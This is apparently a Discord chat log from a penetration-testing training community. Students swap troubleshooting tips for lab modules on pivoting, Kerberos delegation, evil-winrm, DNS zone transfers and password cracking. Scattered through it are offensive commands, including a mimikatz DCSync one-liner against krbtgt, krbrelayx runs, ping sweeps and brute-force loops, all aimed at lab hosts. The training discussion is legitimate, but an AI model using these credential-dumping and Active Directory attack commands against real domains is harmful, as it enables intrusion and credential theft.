sudo python3 /usr/local/bin/smbserver.py -smb2support CompData /home/htb-ac-767577/ligolo-ng/agent.exe
net use \\10.10.15.83\CompData
xcopy \\10.10.15.83\CompData\agent.exe C:\windows\temp\agent.exe
host a python server in your pwnbox , in the windows machine open powershell wget -Uri http://ip:port/file -outfile name.exe
Also if you choose to use xfreerdp the /drive: function will make your life so simple in regards to file transfers
If you do „net use p: \iptoshare“ does it actually map it to the p drive?
I AM NOT SURE but maybe smbserver need a path not a file like /home/htb-ac-..../ligolo-ng/
Awesome tip ty
Crack Passwords with Hashcat: Cracking WPA/WPA2 > Question 1: is anyone else getting this error when they run make && make install?
cc -O3 -Wall -Wextra -Wpedantic -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lssl -lcrypto -lz -DVERSION_TAG="6.3.2-53-g2836d94" -DVERSION_YEAR="2024" -DWANTZLIB
hcxpcapngtool.c:27:10: fatal error: openssl/core.h: No such file or directory
27 | #include <openssl/core.h>
| ^~~~~~~~~~~~~~~~
compilation terminated.
make: *** [Makefile:96: hcxpcapngtool] Error 1
I have already tried updating/upgrading and I'm using the pwnbox. I should probably just switch over to my VM but this seemed like the quicker option
anyone know why my spawn machine is greyed out
No this channel isn't for generic site support
I used nmap to try to enumerate usernames in sql, but I received an error.
Why not another service. You don't need nmap for enumerating username
hey guys how can i access my network or at least my pc from another city ??
Set up a port forward and private vpn. This channel isn't for that kind of thing btw
oooh thanks which channel is for that kind of things ?
Well you don't have access to it until you follow basic instructions in #welcome , #homelab-sysadm
ok thanks
I tried to find smtp users using smtp-user-enum with no results. I found an email address in the nmap output, figured that was the user I needed and tried to brute force ftp, smtp, and mysql with hydra with no results. When I tried using hydra for mysql, I received an error saying there were too many connections. I used a mutated password list and got the same results. I saw in a previous post that ftp was a dead end for hydra, so I am trying to avoid a rabbit hole. I also used Medusa from the previous modules to try to find the password which didn't pan out either.
Hello, I have a problem with the student subscription, I already paid the subscription 1 day ago and it has not yet been activated
Sometimes you need the user@domain or just user. But smtp-user-enum should work
You might need to play with some of the values
someone for help me please ?
Message website support, nothing can be done on discord
question number ?
1
Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
And doesn't it take some time to activate?
It should be immediate, but again. Message support via the green bubble on academy
The support staff do not monitor the discord
thx
let me fire it up and try
yes but i do connect ssh and create a web server (python3 -m http.server 8080) on root ? or just use wget http://uri/flag.txt -o flag.txt
flag.txt 100%[===================>] 33 --.-KB/s in 0s
how can i hack wifi
yes
Sorry about this question but how would I transfer the file to a VM target
Download additional_samples.zip from this module's resources (available at the upper right corner) and transfer the .zip file to this section's target
Right click and copy the link
Then wget {paste}
Alternatively most vms have methods to transfer from host to vm
||wget 10.129.33.70/flag.txt|| @marsh echo
it must have had a problem now that it works
yes i do the command many times but now it's work
maybe you didnt specify the port
its port 80
oh
no need, even specifying the port didn't work
but tbh i do not know why its "python" in the question
and by default wget takes port 80 if I'm not mistaken
i didnt read all i was assuming that you had to wget the python http server
I haven't figured out how to use python to download the file either, except by creating a server on the target and wgetting through it, I don't see how to do it.
it´s probably meant so
but in the question we don't have access to the target
the http.server is done once on the target
thanks
don't worry and thank you
Probably is a transfer from host to VM, because the target has no connection to the internet
You can check gtfobins section on python, it has code on how to download with it but it’s not very elegant looking
i hope too😭
okay thank you a lot now i understand
anyone know why i have this (skill assessment website , Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
What module is this for?
login brute forcing
Anyone know why I am getting this error in the Kerberos Module?
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
Traceback (most recent call last):
File "/home/htb-ac-722940/krbrelayx/dnstool.py", line 610, in <module>
main()
File "/home/htb-ac-722940/krbrelayx/dnstool.py", line 532, in main
record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp))
File "/home/htb-ac-722940/krbrelayx/dnstool.py", line 256, in get_next_serial
res = dnsresolver.resolve(zone, 'SOA',tcp=tcp)
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 1030, in resolve
(request, answer) = resolution.next_request()
File "/usr/lib/python3/dist-packages/dns/resolver.py", line 584, in next_request
raise NXDOMAIN(qnames=self.qnames_to_try,
dns.resolver.NXDOMAIN: The DNS query name does not exist: INLANEFREIGHT.LOCAL.
# Your system has configured 'manage_etc_hosts' as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of 'manage_etc_hosts' in
# /etc/cloud/cloud.cfg or cloud-config from user-data
#
127.0.1.1 upcloud-capture-droplet upcloud-capture-droplet
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-c7nmbyteb8 htb-c7nmbyteb8.htb-cloud.com
10.129.205.35 dc01.inlanefreight.local
You have the DC but not the root domain
# Your system has configured 'manage_etc_hosts' as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of 'manage_etc_hosts' in
# /etc/cloud/cloud.cfg or cloud-config from user-data
#
127.0.1.1 upcloud-capture-droplet upcloud-capture-droplet
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-c7nmbyteb8 htb-c7nmbyteb8.htb-cloud.com
10.129.205.35 inlanefreight.local
10.129.205.35 dc01.inlanefreight.local
Throws the same error.
login brute forcing
I saw your reply
I haven't done this module so I can't offer insight
Maybe the target died
ok
I managed to fix the error by just providing the IP of the DNS server directly. I don't know why it doesn't work when the DNS server IP is added directly to /etc/hosts. However I now get this error...
sudo python krbrelayx.py -p C@lluMDIXON
<SNIP>
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
Exception in thread Thread-2:
[*] Servers started, waiting for connections
Traceback (most recent call last):
File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
self.run()
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 539, in run
self.server = self.HTTPServer((self.config.interfaceIp, self.config.listeningPort), self.HTTPHandler, self.config)
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 45, in init
socketserver.TCPServer.init(self,server_address, RequestHandlerClass)
File "/usr/lib/python3.9/socketserver.py", line 452, in init
self.server_bind()
File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
[*] SMBD: Received connection from 10.129.205.35
[-] Could not find the correct encryption key! Ticket is encrypted with keytype 23, but keytype(s) were supplied
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
Well one of the errors is port in use
Looks like you didn’t put the hash for decryption correctly in your setup of krbrelayx
It doesn't appear we're ever given the hash for the callum.dixon account anywhere in the challenge description.
Which module is it?
I solved it by just hashing callums password to NTLM(https://codebeautify.org/ntlm-hash-generator) and providing it in the -hashes argument instead of the plain text password.
I Wonder if it’s the @ in the pw. Mb if you had put the pw in single quotes it would’ve worked
good question.
smtp-user-enum worked out of nowhere so I am trying to brute force ftp. I don't know if this is the best answer though, since I saw in a previous post ftp is a dead end, but smtp and mysql keep returning errors.
I did. this section 2 days ago or so and I can’t even tell you how I did it anymore lol. But your method works too
I rdp-ed into the AD Skills Assessment 2 machine and then ran a pth with the mssqlsvc user with an xfreerdp command and am getting this error:
dig AXFR @10.129.203.6 inlanefreight.htb why does this fail Target: 10.129.203.6
Life Left: 109 minute(s)
- 1 Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. attacking common services
└──╼ $dig AXFR @10.129.203.6 inlanefreight.htb
; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> AXFR @10.129.203.6 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
4
Nevermind. I had to look back at the password attack section under "Enable Restricted Admin Mode to Allow PtH"
hitting an openssl error with evilwinrm
Try the command on the subdomains.
Got a screenshot?
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Error: Exiting with code 1
using proxychains
@heavy marsh can i dm u
DF001's comment works if I remember correctly
If it's spoilers sure, otherwise I like things out in plain view so it's searchable.
Someone posted this in erratum 10/13/2023 @ 5:31am:
I got some feedback for Module: Password Attacks
Right as the first practice, we should use evil-winrm. At least on my blackarch system this does not work at all out of the box. I get the following error:
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Error: Exiting with code 1
After some googling, I found this: https://forum.manjaro.org/t/openssl-issue-with-ruby-3-0-6p216/147369
It seems to be related to a blacklisting of the MD4 algorithm. You need to modify the file /etc/ssl/openssl.cnf for it to work.
I feel like this should be mentioned in the module.
Hi guys, I am trying to run the tool evil-winrm but I am running into an error that suggests an issue with my version of openSSL. I used to solve this issue by doing what was mentioned here Evil-WinRM - OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error · Issue #3593 · BlackArch/blackarch · GitH...
There is something you have to do to verify your account so that you can post screenshots
I forget how. I remember jumping through a bunch of hoops when I first joined.
Edit that OpenSSL config file with the instructions above and try again.
What module/section/question?
im on attacking enterprise network
i added the text to the openssl file and its still erroring out
i finished ad today
i gotta evilwinrm into this box to proceed and keep hitting this error. i had ligolo up but it didnt like it so i followed the section and forwarded ports to tunnel into the network but im stuck. maybe i should restart with kali, on my personal parrot vm at the moment
im 99% finished with the cpts path and an error is holding me up. not ready for the test due to my lack of report skills but would like to be able to finish this section
yeah im on the latest parrot vm not pwnbox only have had luck with ligolo-ng the whole pivoting tunneling module was broken for me and support couldnt help
just messaged support, the bot told me no one's in the office until saturday
lol like a real pentest 😄
do i have to add the ip to the dns server?
in /etc/hosts
Hmm... I am connected through openvpn > VMWare kali ... But cant ping the machine at all? if i go for ifconfig, i can see i am on the same network 10.10.11~? same with nmap, doesnt show anything.. And the site says i am connected, can see out/in etc.. Am I just stupid today? ^^
Which section talks about mimikatz one-liners?
.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" "exit"
like that one?
AD : credentials probably
no notes ?
not in my notes, found it somewhere else
I would like to know whether it is something I should have just figured out on my own or something covered in the modules
I just finished AD Skills Assessment Part 2
i did too today
Nice!
it was quite challenging
Yeah, I needed a lot of help
congrats that one was hard
If I hadn't got hints like the mimikatz one-liner I would have been so lost!
Just trying to figure out where I missed that one
youll be using that methodology going forward
AD - section 28
@heavy marsh
||mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL||
i did 90%+ by myself 🙂
the ad part is important study up on it thats what the last couple of modules is and i believe the test also
Yeah I finished AD assessment 2 last night and it certainly felt like an achievement. I got stuck in two places but with a nudge in the right direction was able to figure it out. It was fun though
how long did it take ?
Anyone got a clue why my Vmware keeps freezing? I've to reboot the whole VM to keep workin' in it ._.
newest version ?
I started on Friday night around 8 PM and 2 hours in I was stuck at figuring out my next steps with the SQL server, I figured it out and then the target reset on me so I got frustrated and I decided to continue on Saturday then got stuck on a really stupid part where I couldnt figure out how to get to MS01 from SQL01 I spent like 2 hours trying to figure out what I was missing got really angry and took a bit of a break, when I sat back down I instantly figured it out and from there finished the rest in another hour so total about 5 hours. Would've been quicker if I hadn't gotten stuck in that one part
if yes go 1 -3 numbers back
||dig AXFR @10.129.203.6 ns1.inlanefreight.com + 1 Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. inlanefreight.com www.inlanefreight.com blog.inlanefreight.com my.inlanefreight.com support.inlanefreight.com ns1.inlanefreight.com||
hi guys for attacking common services i found the subdomains then i used dig to ask for zone files but none of them work
i needed 8 hrs
Hmm Vmware 17~
VMware® Workstation 17 Pro / 17.0.0 build-20800274 works well
Honestly I feel like we all probably spend a lot of time just getting stuck in one area and not seeing where to go but once you figure out its not as time consuming
make sure you're using enough ram, ime 2gs isnt enough
i think foothold took me 1 hr
17.5.x its says :3
Oh man I did enumeration with CME for one of the questions and it took forever to complete that was a good chunk of time spent right there doing nothing just waiting for that to finish
same here 😄
Alright ill try reinstall everything
I was ready to rage quit with how long that was taking lol
and priv esc took me some time, and after it was done ... my head hit the table lol
any tips for + 1 Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
attacking common services? i used subbrute and found subdomains then i tried to do zone file transfer with those subdomains for that dns server ip
probably add nameserver to etc/hosts
when you connected to the ligolo through session and ran 'ifconfig' (after you ran the ./agent.exe command on windows), did you get three interfaces that contain IP networks like in the following screenshots?
it depends on the pivot host
Don't you have to connect to the target host and then run this command on the target host(./agent -connect 10.10.15.83:11601 -ignore-cert’ ...which connects back to the ligolo-ng program on the attack host) and then you would have to figure out with the pivot host is from there
yes , but when you run ifconfig from the session of ligolo , you basically get the output of ifconfig of the pivot host
||If it shows 172.x.x.x address, thats basically the pivot address since its an internal address. the other two are the loop address and the IP of the target||?
you should be able to read the ipconfig/ifconfig output if you want to do pivoting , but basically if you have three interfaces one is lo , and the other one is the one in the same network with the attacker machine , then the third one is the most important for you , try to use ping sweep to figure out which hosts you can reach from there
I'm stuck on the fuzzing skills assessment. After about an hour trying to fuzz in different ways, I googled a guide, and according to the guide, the syntax I was using that got no results should've given me the answer. I'm currently using: ffuf -w /usr/share/wordlists/seclists/Discover/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb/FUZZ -recursion -recursion-depth 1 -e ".php7" -v -fc 403.
did you get any relevant errors?
what does the question say?
"One of the pages you will identify should say 'You don't have access!'
What is the full page URL
And the hint is to use recursive fuzzing on the subdomains until I get a hit
Hi, I am new here. By the way, silly question... You typed the filepath to the wordlist correctly in a case sensitive manner right?
why the php7 extension
That's one of the three extensions I got from extension fuzzing
“you don’t have access” that should return 403 forbidden
I've tried all three on all three subdomains
and your command filters out the code 403
Oh I know the problem!
This happened to me too. Try using the ip address rather than faculty.htb
It's not a 403 "You don't have access"
You should definitely get a hit back
It's a page that successfully loads where they've put "You don't have access!" in huge font in html
silly question did you add the faculty.academy.htb to the hosts file ?
I did
Okay, I realize the problem now. User error again. I fuzzed for so long that the target machine despawned.
a website could be customized like that btw
bruuuh
It happens 😅
By the way, nice to meet you all. Looking forward to annoying you with my newbie questions.
||I saw that I had the local address 127.0.0.1 , 10.129.119.248/16 , and 172.16.6.100/16 (based on the ifconfig output)
I ran the following ping sweeps and neither listed any results:
for i in {1..254} ;do (ping -c 1 172.16.6.$i | grep "bytes from" &);done
for i in {1..254} ;do (ping -c 1 10.129.119.$i | grep "bytes from" &) ;done.
I did the ip route method and it listed some ip addresses
||
Gamers, anyone here who can help me with the XSS/phishing module? I cannot get the payload to go through.
How do I get roles to access more channels?
use the same payload used in the section
It doesn't work for me fully; it doesn't delete the submit link and I have to modify it slightly.
Hey everyone, I'm having issues using pypykatz.
I've had my Kali machine for a while; I'm getting issues with a deprecation (egg, pypa I think), and pip3 install pypykatz gives a lot of deprecation errors, which I think are giving me errors for the LSA minidump.
I tried Volatility, I think it is.
What other tools can I use to extract passwords from lsass.dmp?
But Volatility didn't dump passwords.
what tools were showcased in the module/section?
I wouldn't mind being able to fix this deprecation issue with Python, but it looks like a nightmare online.
pypykatz. I dropped mimikatz on there to try to get the passwords, or I can use SAM dumps I imagine, but I wanted to fix this pypykatz and use it; mimikatz might not always be available.
if mimikatz isn't available on the system: make it available
¯\_(ツ)_/¯
also dumps tend to be hashes
Just one of the few things I found literally only googling "lsa dump".
Yeah, I know, but I'd rather use the tool in the section.
that's not the same as lsass memdump btw
spewing, do you know anything about the deprecation fix with Python pip?
they store different things
pypykatz is the only way to parse lsass dump on linux afaik
pypykatz is written in Python 2, yeah?
Yeah, Python 3.
Same issue with the Python 2 deprecation.
I mean, it helps if you say what the actual error is.
Your Python env is probably messed up; create a new venv or try installing using pipx.
this too
instead of "deprecation error"
DEPRECATION: Loading egg at /usr/local/lib/python3.12/site-packages/idna-3.6-py3.12.egg is deprecated. pip 24.3 will enforce this behaviour change. A possible replacement is to use pip for package installation.. Discussion can be found at https://github.com/pypa/pip/issues/12330
because that is a VERY wide net of errors
Multiple of these, and I've been on GitHub and read this thread too.
All relates to the 12330 issue.
Python errors never end.
Hahahahha, I know, it's a nightmare in the discussion.
Try to use pipx
what's your command to install it
Or new env
pip3 install pypykatz, and also tried pip install pypykatz, which relates to pip3.
trying pipx now
What about apt install python3-pypykatz?
Done, same issue.
Tried all the basic fixes and tried to fix the deprecation; was hoping someone on here has fixed it.
Tried the Kali pypykatz; the missing bits need pip install pypykatz, which goes back to the deprecation.
I guess no one else has had this issue with pypykatz?
it's most probably an issue with your python env
I haven't had any issues but I know python can be a real pain in the ass, honestly I've gotten so frustrated with python dependencies to the point where I'll just spin up a new VM just for whatever I'm trying to run that's giving me issues. Probably not the most time efficient way to solve problems but it's worked for me lol
Yep, ok, that's my only option I think.
Does the starting point modules not count towards your stats on your profile at all?
I'm sure that's not your only option, it's just my lazy way of dealing with the problem sometimes
Yeah, I didn't really want to do a fresh VM boot for one question; I wanted to fix the Python env
and get this package going.
it can definitely be fixed but that will have to be up to you
no, only active boxes and challenges do
Yeah fixing the python env is definitely the actual solution
Alternatively can't you just try answering this question on the pwnbox? Pypykatz is probably working fine on there
Yeah, I don't have massive knowledge of Python environments with libraries. I know I have built my own programs in Python to make stuff easier, and GUIs for some things, but I have no idea about environments.
It's something to do with the Python .egg
being discontinued.
Yeah, I have been on there earlier and tried the fixes.
what fixes did you try
the recommendation is to reinstall the deprecated packages
https://github.com/pypa/pip/issues/12330
which is the .egg package
Gotcha thanks!
Thank you guys, but yeah, I have tried a lot of these basic Google fixes before coming on here and raided GitHub as well.
When you try to reinstall packages it tells you the deprecation error.
I guess you haven't googled enough then: https://stackoverflow.com/questions/1231688/how-do-i-remove-packages-installed-with-pythons-easy-install
lol, easy-install is tied to the deprecation packages.
have a read
Please, if anyone has an answer, try it first before posting on here, because most of them I have tried. I'm very resourceful before asking on here; I more ask on here if someone has run into the problem and fixed it themselves, which holds a bit more credibility than a link to a page there's a good chance I have read before asking on here.
lol, you haven't provided any info on your side and what you have tried.
||I tried the fping sweep command (fping -asgq 172.16.6.0/16) and the only result it was showing was 172.16.6.100.
I then tried to do a 'double pivot' and typed './agent.exe -connect 172.16.6.100:11601 -ignore-cert', thinking that it would connect me to MS01 (similar to the screenshot that shows MS01 as network C in the example in this link: https://4pfsec.com/ligolo#heading-adding-a-new-route-on-proxy-server)... but I guess not.||
Wait, aren't you the guy that couldn't figure out a module despite me giving you multiple hints, but you wanted the exact steps instead?
Remind me not to help you again.
pip install, pip3 install, apt install, easy_install, get-pip install, the GitHub version. I've been on Reddit, GitHub, HTB forums, TryHackMe forums, Google links and private chats on other servers seeing if anyone has come across this and wondered if they fixed it. It's a deprecation error that affects many packages, including CME packages; it looks like an issue that comes with Python 2 to Python 3 libraries. But either way, if anyone has had issues with pypykatz running for a dump, or deprecation issues, and has fixed it, not a quick Google, please comment on here.
Attacking Common Services - Attack DNS:
Challenge question says issues:
I am using ./subbrute.py to try and get domains and I get nothing.
My syntax:
./subbrute.py inlanefreight.htb -s names.txt -r resolvers.txt
resolvers.txt has ns1.inlanefreight.htb. Any idea why the Python is throwing an error?
Xerous, you did this before and posted stuff that I told you I already tried, posting Google links that are like at the top, then when I tell you yes, they do not work, you get upset and say "remind me not to help you again"....
If you haven't come across it or tried to even have a look yourself, why get upset?
I am happy for help, but I look at Google too, and GitHub, Reddit, HTB forums, TryHackMe forums, even Python forums to find an answer before asking. But thank you for the help; I just do commit a lot of time to solving before asking on here.
It's very difficult for us to debug when we're told you've tried a general source (ie reddit, github). It'd be a lot more helpful if you instead listed the methods you've found and either why they're not suitable for your situation, or how they didn't work (not 'didnt work', an error message is more helpful).
So on the Cracking Miscellaneous Files and Hashes module I submitted the answer from the cracked hash, and it was wrong. So I was over here running hashcat --keep-guessing, thinking I got a false positive. I refreshed the page and submitted it again and it took it.
I'll be home shortly, so I'll have a full read through the chat, and give you a hand once I've done that 🫡
yeah I'd be quite impressed if hashcat got a false positive
How long did you spend rechecking it?
can't post pics for some reason
Did you add the IP to the vhost file?
Yup, added the IP and inlanefreight.htb to /etc/hosts and added ns.inlanefreight.htb to resolvers for ./subbrute.py.
I did use another command with another wordlist and found some subdomains, but the AXFR is not working:
for sub in $(cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt);do dig $sub.inlanefreight.htb @10.129.155.146 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
So far pulled 3 domains:
helpd...
contr...
ns...
Found the root doing a regular dig.
Remove the ns.
Just add “inlanefreight.htb” to the resolvers.txt and run it again
Did the echo "inlanefreight.htb" > resolvers.txt
then got the error again.
Will the script run with the error? Last time I had it up for an hour and got nothing.
Add the IP to resolvers.txt
It's also likely due to the fact you didn't have the ns.inlanefreight.htb in your /etc/hosts file.
It can't look something up if it doesn't have a reference
It should take ~5-10 minutes at most to start getting info
Ok thanks. A bit confused.
in the resolvers.txt I now have this:
<ip-addr-of-dns> inlanefreight.htb
same for /etc/hosts
resolvers.txt is formatted differently.
They need to be on separate lines.
And tbh just the IP is good enough.
Ok thanks a bunch. Seems to be working now.
From its frame of reference, it thinks that the "ip domain" line is the WHOLE reference.